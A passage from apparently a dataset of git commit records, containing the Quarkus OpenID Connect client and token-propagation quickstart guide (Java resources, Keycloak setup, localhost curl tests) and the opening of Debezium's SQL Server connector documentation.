keycloak -e KEYCLOAK_ADMIN=admin -e KEYCLOAK_ADMIN_PASSWORD=admin -p 8180:8080 quay.io\/keycloak\/keycloak:{keycloak.version} start-dev\n----\n\nwhere `keycloak.version` should be set to `17.0.0` or higher.\n\nYou should be able to access your Keycloak Server at http:\/\/localhost:8180[localhost:8180].\n\nLog in as the `admin` user to access the Keycloak Administration Console. Username should be `admin` and password `admin`.\n\nImport the {quickstarts-tree-url}\/security-openid-connect-client-quickstart\/config\/quarkus-realm.json[realm configuration file] to create a new realm. For more details, see the Keycloak documentation about how to https:\/\/www.keycloak.org\/docs\/latest\/server_admin\/index.html#_create-realm[create a new realm].\n\nThis `quarkus` realm file will add a `frontend` client, and `alice` and `admin` users. `alice` has a `user` role, `admin` - both `user` and `admin` roles.\n\n[[keycloak-dev-mode]]\n== Running the Application in Dev mode\n\nTo run the application in a dev mode, use:\n\ninclude::{includes}\/devtools\/dev.adoc[]\n\nxref:security-openid-connect-dev-services.adoc[Dev Services for Keycloak] will launch a Keycloak container and import a `quarkus-realm.json`.\n\nOpen a xref:dev-ui.adoc[Dev UI] available at http:\/\/localhost:8080\/q\/dev[\/q\/dev] and click on a `Provider: Keycloak` link in an `OpenID Connect` `Dev UI` card.\n\nYou will be asked to log in into a `Single Page Application` provided by `OpenID Connect Dev UI`:\n\n * Login as `alice` (password: `alice`) who has a `user` role\n ** accessing `\/frontend\/user-name-with-propagated-token` will return `200`\n ** accessing `\/frontend\/admin-name-with-propagated-token` will return `403`\n * Logout and login as `admin` (password: `admin`) who has both `admin` and `user` roles\n ** accessing `\/frontend\/user-name-with-propagated-token` will return `200`\n ** accessing `\/frontend\/admin-name-with-propagated-token` will return `200`\n\nIn this case you are testing that `FrontendResource` can propagate the access tokens acquired by `OpenID Connect Dev UI`.\n\n== Running the Application in JVM mode\n\nWhen you're done playing with the `dev` mode\" you can run it as a standard Java application.\n\nFirst compile it:\n\ninclude::{includes}\/devtools\/build.adoc[]\n\nThen run it:\n\n[source,bash]\n----\njava -jar target\/quarkus-app\/quarkus-run.jar\n----\n\n== Running the Application in Native Mode\n\nThis same demo can be compiled into native code: no modifications required.\n\nThis implies that you no longer need to install a JVM on your\nproduction environment, as the runtime technology is included in\nthe produced binary, and optimized to run with minimal resource overhead.\n\nCompilation will take a bit longer, so this step is disabled by default;\nlet's build again by enabling the `native` profile:\n\ninclude::{includes}\/devtools\/build-native.adoc[]\n\nAfter getting a cup of coffee, you'll be able to run this binary directly:\n\n[source,bash]\n----\n.\/target\/security-openid-connect-quickstart-1.0.0-SNAPSHOT-runner\n----\n\n== Testing the Application\n\nSee <<keycloak-dev-mode, Running the Application in Dev mode>> section above about testing your application in dev mode.\n\nYou can test the application launched in JVM or Native modes with `curl`.\n\nObtain an access token for `alice`:\n\n[source,bash]\n----\nexport access_token=$(\\\n curl --insecure -X POST http:\/\/localhost:8180\/realms\/quarkus\/protocol\/openid-connect\/token \\\n --user backend-service:secret \\\n -H 'content-type: application\/x-www-form-urlencoded' \\\n -d 'username=alice&password=alice&grant_type=password' | jq --raw-output '.access_token' \\\n )\n----\n\nNow use this token to call `\/frontend\/user-name-with-propagated-token` and `\/frontend\/admin-name-with-propagated-token`:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `200` status code and the name `alice` while\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `403` - recall that `alice` only has a `user` role.\n\nNext obtain an access token for `admin`:\n\n[source,bash]\n----\nexport access_token=$(\\\n curl --insecure -X POST http:\/\/localhost:8180\/realms\/quarkus\/protocol\/openid-connect\/token \\\n --user backend-service:secret \\\n -H 'content-type: application\/x-www-form-urlencoded' \\\n -d 'username=admin&password=admin&grant_type=password' | jq --raw-output '.access_token' \\\n )\n----\n\nand use this token to call `\/frontend\/user-name-with-propagated-token` and `\/frontend\/admin-name-with-propagated-token`:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `200` status code and the name `admin`, and\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill also return `200` status code and the name `admin`, as `admin` has both `user` and `admin` roles.\n\n\nNow lets check `FrontendResource` methods which do not propagate the existing tokens but use `OidcClient` to acquire and propagate the tokens. You have seen that `OidcClient` is configured to acquire the tokens for the `alice` user, so:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-oidc-client`\n----\n\nwill return `200` status code and the name `alice`, but\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-oidc-client`\n----\n\nwill return `403` status code.\n\n== References\n\n* xref:security-openid-connect-client-reference.adoc[OpenID Connect Client and Token Propagation Reference Guide]\n* xref:security-openid-connect.adoc[Using OpenID Connect to Protect Service Applications]\n* xref:security.adoc[Quarkus Security]\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= OpenID Connect Client and Token Propagation Quickstart\n\ninclude::.\/attributes.adoc[]\n:toc:\n\nThis quickstart demonstrates how to use `OpenID Connect Client Reactive Filter` to acquire and propagate access tokens as `HTTP Authorization Bearer` access tokens, alongside `OpenID Token Propagation Reactive Filter` which propagates the incoming `HTTP Authorization Bearer` access tokens.\n\nPlease check xref:security-openid-connect-client-reference.adoc[OpenID Connect Client and Token Propagation Reference Guide] for all the information related to `Oidc Client` and `Token Propagation` support in Quarkus.\n\nPlease also read xref:security-openid-connect.adoc[Using OpenID Connect to Protect Service Applications] guide if you need to protect your applications using Bearer Token Authorization.\n\n== Prerequisites\n\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n* https:\/\/stedolan.github.io\/jq\/[jq tool]\n\n== Architecture\n\nIn this example, we will build an application which consists of two JAX-RS resources, `FrontendResource` and `ProtectedResource`. `FrontendResource` propagates access tokens to `ProtectedResource` and uses either `OpenID Connect Client Reactive Filter` to acquire a token first before propagating it or `OpenID Token Propagation Reactive Filter` to propagate the incoming, already existing access token.\n\n`FrontendResource` has 4 endpoints:\n\n* `\/frontend\/user-name-with-oidc-client-token`\n* `\/frontend\/admin-name-with-oidc-client-token`\n* `\/frontend\/user-name-with-propagated-token`\n* `\/frontend\/admin-name-with-propagated-token`\n\n`FrontendResource` will use REST Client with `OpenID Connect Client Reactive Filter` to acquire and propagate an access token to `ProtectedResource` when either `\/frontend\/user-name-with-oidc-client` or `\/frontend\/admin-name-with-oidc-client` is called. And it will use REST Client with `OpenID Connect Token Propagation Reactive Filter` to propagate the current incoming access token to `ProtectedResource` when either `\/frontend\/user-name-with-propagated-token` or `\/frontend\/admin-name-with-propagated-token` is called.\n\n`ProtecedResource` has 2 endpoints:\n\n* `\/protected\/user-name`\n* `\/protected\/admin-name`\n\nBoth of these endpoints return the username extracted from the incoming access token which was propagated to `ProtectedResource` from `FrontendResource`. The only difference between these endpoints is that calling `\/protected\/user-name` is only allowed if the current access token has a `user` role and calling `\/protected\/admin-name` is only allowed if the current access token has an `admin` role.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `security-openid-connect-quickstart` {quickstarts-tree-url}\/security-openid-connect-client-quickstart[directory].\n\n== Creating the Maven Project\n\nFirst, we need a new project. Create a new project with the following command:\n\n:create-app-artifact-id: security-openid-connect-client-quickstart\n:create-app-extensions: oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nThis command generates a Maven project, importing the `oidc`, `oidc-client-reactive-filter`, `oidc-client-reactive-filter` and `resteasy-reactive` extensions.\n\nIf you already have your Quarkus project configured, you can add these extensions to your project by running the following command in your project base directory:\n\n:add-extension-extensions: oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nThis will add the following to your build file:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc-client-reactive-filter<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc-token-propagation-reactive<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-reactive<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.quarkus:quarkus-oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\")\n----\n\n== Writing the application\n\nLet's start by implementing `ProtectedResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.annotation.security.RolesAllowed;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport io.quarkus.security.Authenticated;\nimport io.smallrye.mutiny.Uni;\n\nimport org.eclipse.microprofile.jwt.JsonWebToken;\n\n@Path(\"\/protected\")\n@Authenticated\npublic class ProtectedResource {\n\n @Inject\n JsonWebToken principal;\n\n @GET\n @RolesAllowed(\"user\")\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n public Uni<String> userName() {\n return Uni.createFrom().item(principal.getName());\n }\n\n @GET\n @RolesAllowed(\"admin\")\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n public Uni<String> adminName() {\n return Uni.createFrom().item(principal.getName());\n }\n}\n----\n\nAs you can see `ProtectedResource` returns a name from both `userName()` and `adminName()` methods. The name is extracted from the current `JsonWebToken`.\n\nNext lets add REST Client with `OpenID Connect Client Reactive Filter` and another REST Client with `OpenID Connect Token Propagation Filter`, `FrontendResource` will use these two clients to call `ProtectedResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.annotation.RegisterProvider;\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport io.quarkus.oidc.client.reactive.filter.OidcClientRequestReactiveFilter;\nimport io.smallrye.mutiny.Uni;\n\n@RegisterRestClient\n@RegisterProvider(OidcClientRequestReactiveFilter.class)\n@Path(\"\/\")\npublic interface ProtectedResourceOidcClientFilter {\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n Uni<String> getUserName();\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n Uni<String> getAdminName();\n}\n----\n\nwhere `ProtectedResourceOidcClientFilter` will depend on `OidcClientRequestReactiveFilter` to acquire and propagate the tokens and\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.annotation.RegisterProvider;\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport io.quarkus.oidc.token.propagation.reactive.AccessTokenRequestReactiveFilter;\nimport io.smallrye.mutiny.Uni;\n\n@RegisterRestClient\n@RegisterProvider(AccessTokenRequestReactiveFilter.class)\n@Path(\"\/\")\npublic interface ProtectedResourceTokenPropagationFilter {\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n Uni<String> getUserName();\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n Uni<String> getAdminName();\n}\n----\n\nwhere `ProtectedResourceTokenPropagationFilter` will depend on `AccessTokenRequestReactiveFilter` to propagate the incoming, already existing tokens.\n\nNote that both `ProtectedResourceOidcClientFilter` and `ProtectedResourceTokenPropagationFilter` interfaces are identical - the reason behind it is that combining `OidcClientRequestReactiveFilter` and `AccessTokenRequestReactiveFilter` on the same REST Client will cause side effects as both filters can interfere with other, for example, `OidcClientRequestReactiveFilter` may override the token propagated by `AccessTokenRequestReactiveFilter` or `AccessTokenRequestReactiveFilter` can fail if it is called when no token is available to propagate and `OidcClientRequestReactiveFilter` is expected to acquire a new token instead.\n\nNow let's complete creating the application with adding `FrontendResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.WebApplicationException;\n\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\nimport io.smallrye.mutiny.Uni;\n\n@Path(\"\/frontend\")\npublic class FrontendResource {\n @Inject\n @RestClient\n ProtectedResourceOidcClientFilter protectedResourceOidcClientFilter;\n\n @Inject\n @RestClient\n ProtectedResourceTokenPropagationFilter protectedResourceTokenPropagationFilter;\n\n @GET\n @Path(\"user-name-with-oidc-client-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getUserNameWithOidcClientToken() {\n return protectedResourceOidcClientFilter.getUserName();\n }\n\n @GET\n @Path(\"admin-name-with-oidc-client-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getAdminNameWithOidcClientToken() {\n\t return protectedResourceOidcClientFilter.getAdminName();\n }\n\n @GET\n @Path(\"user-name-with-propagated-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getUserNameWithPropagatedToken() {\n return protectedResourceTokenPropagationFilter.getUserName();\n }\n\n @GET\n @Path(\"admin-name-with-propagated-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getAdminNameWithPropagatedToken() {\n return protectedResourceTokenPropagationFilter.getAdminName();\n }\n}\n----\n\n`FrontendResource` will use REST Client with `OpenID Connect Client Reactive Filter` to acquire and propagate an access token to `ProtectedResource` when either `\/frontend\/user-name-with-oidc-client` or `\/frontend\/admin-name-with-oidc-client` is called. And it will use REST Client with `OpenID Connect Token Propagation Reactive Filter` to propagate the current incoming access token to `ProtectedResource` when either `\/frontend\/user-name-with-propagated-token` or `\/frontend\/admin-name-with-propagated-token` is called.\n\nFinally, lets add a JAX-RS `ExceptionMapper`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.core.Response;\nimport javax.ws.rs.ext.ExceptionMapper;\nimport javax.ws.rs.ext.Provider;\n\nimport org.jboss.resteasy.reactive.ClientWebApplicationException;\n\n@Provider\npublic class FrontendExceptionMapper implements ExceptionMapper<ClientWebApplicationException> {\n\n\t@Override\n\tpublic Response toResponse(ClientWebApplicationException t) {\n\t\treturn Response.status(t.getResponse().getStatus()).build();\n\t}\n\n}\n----\n\nThis exception mapper is only added to verify during the tests that `ProtectedResource` returns `403` when the token has no expected role. Without this mapper `RESTEasy Reactive` will correctly convert the exceptions which will escape from REST Client calls to `500` to avoid leaking the information from the downstream resources such as `ProtectedResource` but in the tests it will not be possible to assert that `500` is in fact caused by an authorization exception as opposed to some internal error.\n\n== Configuring the application\n\nWe have prepared the code, and now let's configure the application:\n\n[source,properties]\n----\n# Configure OIDC\n\n%prod.quarkus.oidc.auth-server-url=http:\/\/localhost:8180\/realms\/quarkus\nquarkus.oidc.client-id=backend-service\nquarkus.oidc.credentials.secret=secret\n\n# Tell Dev Services for Keycloak to import the realm file\n# This property is not effective when running the application in JVM or Native modes but only in dev and test modes.\n\nquarkus.keycloak.devservices.realm-path=quarkus-realm.json\n\n# Configure OIDC Client\n\nquarkus.oidc-client.auth-server-url=${quarkus.oidc.auth-server-url}\nquarkus.oidc-client.client-id=${quarkus.oidc.client-id}\nquarkus.oidc-client.credentials.secret=${quarkus.oidc.credentials.secret}\nquarkus.oidc-client.grant.type=password\nquarkus.oidc-client.grant-options.password.username=alice\nquarkus.oidc-client.grant-options.password.password=alice\n\n# Configure REST Clients\n\n%prod.port=8080\n%dev.port=8080\n%test.port=8081\n\norg.acme.security.openid.connect.client.ProtectedResourceOidcClientFilter\/mp-rest\/url=http:\/\/localhost:${port}\/protected\norg.acme.security.openid.connect.client.ProtectedResourceTokenPropagationFilter\/mp-rest\/url=http:\/\/localhost:${port}\/protected\n----\n\nThis configuration references Keycloak which will be used by `ProtectedResource` to verify the incoming access tokens and by `OidcClient` to get the tokens for a user `alice` using a `password` grant. Both RESTClients point to `ProtectedResource`'s HTTP address.\n\nNOTE: Adding a `%prod.` profile prefix to `quarkus.oidc.auth-server-url` ensures that `Dev Services for Keycloak` will launch a container for you when the application is run in dev or test modes. See <<keycloak-dev-mode, Running the Application in Dev mode>> section below for more information.\n\n== Starting and Configuring the Keycloak Server\n\nNOTE: Do not start the Keycloak server when you run the application in dev mode or test modes - `Dev Services for Keycloak` will launch a container. See <<keycloak-dev-mode, Running the Application in Dev mode>> section below for more information. Make sure to put the {quickstarts-tree-url}\/security-openid-connect-client-quickstart\/config\/quarkus-realm.json[realm configuration file] on the classpath (`target\/classes` directory) so that it gets imported automatically when running in dev mode - unless you have already built a {quickstarts-tree-url}\/security-openid-connect-quickstart[complete solution] in which case this realm file will be added to the classpath during the build.\n\nTo start a Keycloak Server you can use Docker and just run the following command:\n\n[source,bash,subs=attributes+]\n----\ndocker run --name keycloak -e KEYCLOAK_ADMIN=admin -e KEYCLOAK_ADMIN_PASSWORD=admin -p 8180:8080 quay.io\/keycloak\/keycloak:{keycloak.version} start-dev\n----\n\nwhere `keycloak.version` should be set to `17.0.0` or higher.\n\nYou should be able to access your Keycloak Server at http:\/\/localhost:8180[localhost:8180].\n\nLog in as the `admin` user to access the Keycloak Administration Console. Username should be `admin` and password `admin`.\n\nImport the {quickstarts-tree-url}\/security-openid-connect-client-quickstart\/config\/quarkus-realm.json[realm configuration file] to create a new realm. For more details, see the Keycloak documentation about how to https:\/\/www.keycloak.org\/docs\/latest\/server_admin\/index.html#_create-realm[create a new realm].\n\nThis `quarkus` realm file will add a `frontend` client, and `alice` and `admin` users. `alice` has a `user` role, `admin` - both `user` and `admin` roles.\n\n[[keycloak-dev-mode]]\n== Running the Application in Dev mode\n\nTo run the application in a dev mode, use:\n\ninclude::{includes}\/devtools\/dev.adoc[]\n\nxref:security-openid-connect-dev-services.adoc[Dev Services for Keycloak] will launch a Keycloak container and import a `quarkus-realm.json`.\n\nOpen a xref:dev-ui.adoc[Dev UI] available at http:\/\/localhost:8080\/q\/dev[\/q\/dev] and click on a `Provider: Keycloak` link in an `OpenID Connect` `Dev UI` card.\n\nYou will be asked to log in into a `Single Page Application` provided by `OpenID Connect Dev UI`:\n\n * Login as `alice` (password: `alice`) who has a `user` role\n ** accessing `\/frontend\/user-name-with-propagated-token` will return `200`\n ** accessing `\/frontend\/admin-name-with-propagated-token` will return `403`\n * Logout and login as `admin` (password: `admin`) who has both `admin` and `user` roles\n ** accessing `\/frontend\/user-name-with-propagated-token` will return `200`\n ** accessing `\/frontend\/admin-name-with-propagated-token` will return `200`\n\nIn this case you are testing that `FrontendResource` can propagate the access tokens acquired by `OpenID Connect Dev UI`.\n\n== Running the Application in JVM mode\n\nWhen you're done playing with the `dev` mode\" you can run it as a standard Java application.\n\nFirst compile it:\n\ninclude::{includes}\/devtools\/build.adoc[]\n\nThen run it:\n\n[source,bash]\n----\njava -jar target\/quarkus-app\/quarkus-run.jar\n----\n\n== Running the Application in Native Mode\n\nThis same demo can be compiled into native code: no modifications required.\n\nThis implies that you no longer need to install a JVM on your\nproduction environment, as the runtime technology is included in\nthe produced binary, and optimized to run with minimal resource overhead.\n\nCompilation will take a bit longer, so this step is disabled by default;\nlet's build again by enabling the `native` profile:\n\ninclude::{includes}\/devtools\/build-native.adoc[]\n\nAfter getting a cup of coffee, you'll be able to run this binary directly:\n\n[source,bash]\n----\n.\/target\/security-openid-connect-quickstart-1.0.0-SNAPSHOT-runner\n----\n\n== Testing the Application\n\nSee <<keycloak-dev-mode, Running the Application in Dev mode>> section above about testing your application in dev mode.\n\nYou can test the application launched in JVM or Native modes with `curl`.\n\nObtain an access token for `alice`:\n\n[source,bash]\n----\nexport access_token=$(\\\n curl --insecure -X POST http:\/\/localhost:8180\/realms\/quarkus\/protocol\/openid-connect\/token \\\n --user backend-service:secret \\\n -H 'content-type: application\/x-www-form-urlencoded' \\\n -d 'username=alice&password=alice&grant_type=password' | jq --raw-output '.access_token' \\\n )\n----\n\nNow use this token to call `\/frontend\/user-name-with-propagated-token` and `\/frontend\/admin-name-with-propagated-token`:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `200` status code and the name `alice` while\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `403` - recall that `alice` only has a `user` role.\n\nNext obtain an access token for `admin`:\n\n[source,bash]\n----\nexport access_token=$(\\\n curl --insecure -X POST http:\/\/localhost:8180\/realms\/quarkus\/protocol\/openid-connect\/token \\\n --user backend-service:secret \\\n -H 'content-type: application\/x-www-form-urlencoded' \\\n -d 'username=admin&password=admin&grant_type=password' | jq --raw-output '.access_token' \\\n )\n----\n\nand use this token to call `\/frontend\/user-name-with-propagated-token` and `\/frontend\/admin-name-with-propagated-token`:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill return `200` status code and the name `admin`, and\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-propagated-token` \\\n -H \"Authorization: Bearer \"$access_token\n----\n\nwill also return `200` status code and the name `admin`, as `admin` has both `user` and `admin` roles.\n\n\nNow lets check `FrontendResource` methods which do not propagate the existing tokens but use `OidcClient` to acquire and propagate the tokens. You have seen that `OidcClient` is configured to acquire the tokens for the `alice` user, so:\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/user-name-with-oidc-client`\n----\n\nwill return `200` status code and the name `alice`, but\n\n[source,bash]\n----\ncurl -v -X GET \\\n http:\/\/localhost:8080\/frontend\/admin-name-with-oidc-client`\n----\n\nwill return `403` status code.\n\n== References\n\n* xref:security-openid-connect-client-reference.adoc[OpenID Connect Client and Token Propagation Reference Guide]\n* xref:security-openid-connect.adoc[Using OpenID Connect to Protect Service Applications]\n* xref:security.adoc[Quarkus Security]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"08d042aa924a5920df8f0745d8db7ecc83eb68f5","subject":"DBZ-5714 Remove redundant reference to `database.names` list","message":"DBZ-5714 Remove redundant reference to `database.names` list\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/sqlserver.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/sqlserver.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n\/\/ ModuleID: debezium-connector-for-sql-server\n[id=\"debezium-connector-for-sql-server\"]\n= {prodname} connector for SQL Server\n\n:context: sqlserver\n:data-collection: table\n:mbean-name: sql_server\n:connector-file: {context}\n:connector-class: SqlServer\n:connector-name: SQL Server\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\n[NOTE]\n====\nWant to help us further hone and improve it? link:\/docs\/contribute\/[Learn how].\n====\n\ntoc::[]\nendif::community[]\n\nThe {prodname} SQL Server connector captures row-level changes that occur in the schemas of a SQL Server database.\n\nifdef::community[]\nFor information about the SQL Server versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\nendif::community[]\nifdef::product[]\nFor information about the SQL Server versions that are compatible with this connector, see the link:{LinkDebeziumSupportedConfigurations}[{NameDebeziumSupportedConfigurations}].\nendif::product[]\n\nifdef::product[]\n\nFor details about the {prodname} SQL Server connector and its use, see following topics:\n\n* xref:overview-of-debezium-sql-server-connector[]\n* xref:how-debezium-sql-server-connectors-work[]\n* xref:descriptions-of-debezium-sql-server-connector-data-change-events[]\n* xref:how-debezium-sql-server-connectors-map-data-types[]\n* xref:setting-up-sql-server-for-use-with-the-debezium-sql-server-connector[]\n* xref:deployment-of-debezium-sql-server-connectors[]\n* xref:refreshing-capture-tables-after-a-schema-change[]\n* xref:monitoring-debezium-sql-server-connector-performance[]\n\nendif::product[]\n\nThe first time that the {prodname} SQL Server connector connects to a SQL Server database or cluster, it takes a consistent snapshot of the schemas in the database.\nAfter the initial snapshot is complete, the connector continuously captures row-level changes for `INSERT`, `UPDATE`, or `DELETE` operations that are committed to the SQL Server databases that are enabled for CDC.\nThe connector produces events for each data change operation, and streams them to Kafka topics.\nThe connector streams all of the events for a table to a dedicated Kafka topic.\nApplications and services can then consume data change event records from that topic.\n\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} SQL Server connector\n\/\/ ModuleID: overview-of-debezium-sql-server-connector\n[[sqlserver-overview]]\n== Overview\n\nThe {prodname} SQL Server connector is based on the https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/track-changes\/about-change-data-capture-sql-server?view=sql-server-2017[change data capture]\nfeature that is available in https:\/\/blogs.msdn.microsoft.com\/sqlreleaseservices\/sql-server-2016-service-pack-1-sp1-released\/[SQL Server 2016 Service Pack 1 (SP1) and later] Standard edition or Enterprise edition.\nThe SQL Server capture process monitors designated databases and tables, and stores the changes into specifically created _change tables_ that have stored procedure facades.\n\nTo enable the {prodname} SQL Server connector to capture change event records for database operations,\nyou must first enable change data capture on the SQL Server database.\nCDC must be enabled on both the database and on each table that you want to capture.\nAfter you set up CDC on the source database, the connector can capture row-level `INSERT`, `UPDATE`, and `DELETE` operations\nthat occur in the database.\nThe connector writes event records for each source table to a Kafka topic especially dedicated to that table.\nOne topic exists for each captured table.\nClient applications read the Kafka topics for the database tables that they follow, and can respond to the row-level events they consume from those topics.\n\nThe first time that the connector connects to a SQL Server database or cluster, it takes a consistent snapshot of the schemas for all tables for which it is configured to capture changes,\nand streams this state to Kafka.\nAfter the snapshot is complete, the connector continuously captures subsequent row-level changes that occur.\nBy first establishing a consistent view of all of the data, the connector can continue reading without having lost any of the changes that were made while the snapshot was taking place.\n\nThe {prodname} SQL Server connector is tolerant of failures.\nAs the connector reads changes and produces events, it periodically records the position of events in the database log (_LSN \/ Log Sequence Number_).\nIf the connector stops for any reason (including communication failures, network problems, or crashes), after a restart the connector resumes reading the SQL Server _CDC_ tables from the last point that it read.\n\nNOTE: Offsets are committed periodically.\nThey are not committed at the time that a change event occurs.\nAs a result, following an outage, duplicate events might be generated.\n\nFault tolerance also applies to snapshots.\nThat is, if the connector stops during a snapshot, the connector begins a new snapshot when it restarts.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-sql-server-connectors-work\n\/\/ Title: How {prodname} SQL Server connectors work\n[[how-the-sqlserver-connector-works]]\n== How the SQL Server connector works\n\nTo optimally configure and run a {prodname} SQL Server connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and uses metadata.\n\nifdef::product[]\n\nFor details about how the connector works, see the following sections:\n\n* xref:how-debezium-sql-server-connectors-perform-database-snapshots[]\n* xref:how-the-debezium-sql-server-connector-reads-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-sql-server-change-event-records[]\n* xref:how-the-debezium-sql-server-connector-uses-the-schema-change-topic[]\n* xref:descriptions-of-debezium-sql-server-connector-data-change-events[]\n* xref:debezium-sql-server-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} SQL Server connectors perform database snapshots\n\/\/ ModuleID: how-debezium-sql-server-connectors-perform-database-snapshots\n[[sqlserver-snapshots]]\n=== Snapshots\n\nSQL Server CDC is not designed to store a complete history of database changes.\nFor the {prodname} SQL Server connector to establish a baseline for the current state of the database,\nit uses a process called _snapshotting_.\n\nYou can configure how the connector creates snapshots.\nBy default, the connector's snapshot mode is set to `initial`.\nBased on this `initial` snapshot mode, the first time that the connector starts, it performs an initial _consistent snapshot_ of the database.\nThis initial snapshot captures the structure and data for any tables that match the criteria defined by the `include` and `exclude` properties that are configured for the connector (for example, `table.include.list`, `column.include.list`, `table.exclude.list`, and so forth).\n\nWhen the connector creates a snapshot, it completes the following tasks:\n\n1. Determines the tables to be captured.\n2. Obtains a lock on the SQL Server tables for which CDC is enabled to prevent structural changes from occurring during creation of the snapshot.\nThe level of the lock is determined by `snapshot.isolation.mode` configuration option.\n3. Reads the maximum log sequence number (LSN) position in the server's transaction log.\n4. Captures the structure of all relevant tables.\n5. Releases the locks obtained in Step 2, if necessary. In most cases, locks are held for only a short period of time.\n6. Scans the SQL Server source tables and schemas to be captured based on the LSN position that was read in Step 3, generates a `READ` event for each row in the table, and writes the events to the Kafka topic for the table.\n7. Records the successful completion of the snapshot in the connector offsets.\n\nThe resulting initial snapshot captures the current state of each row in the tables that are enabled for CDC.\nFrom this 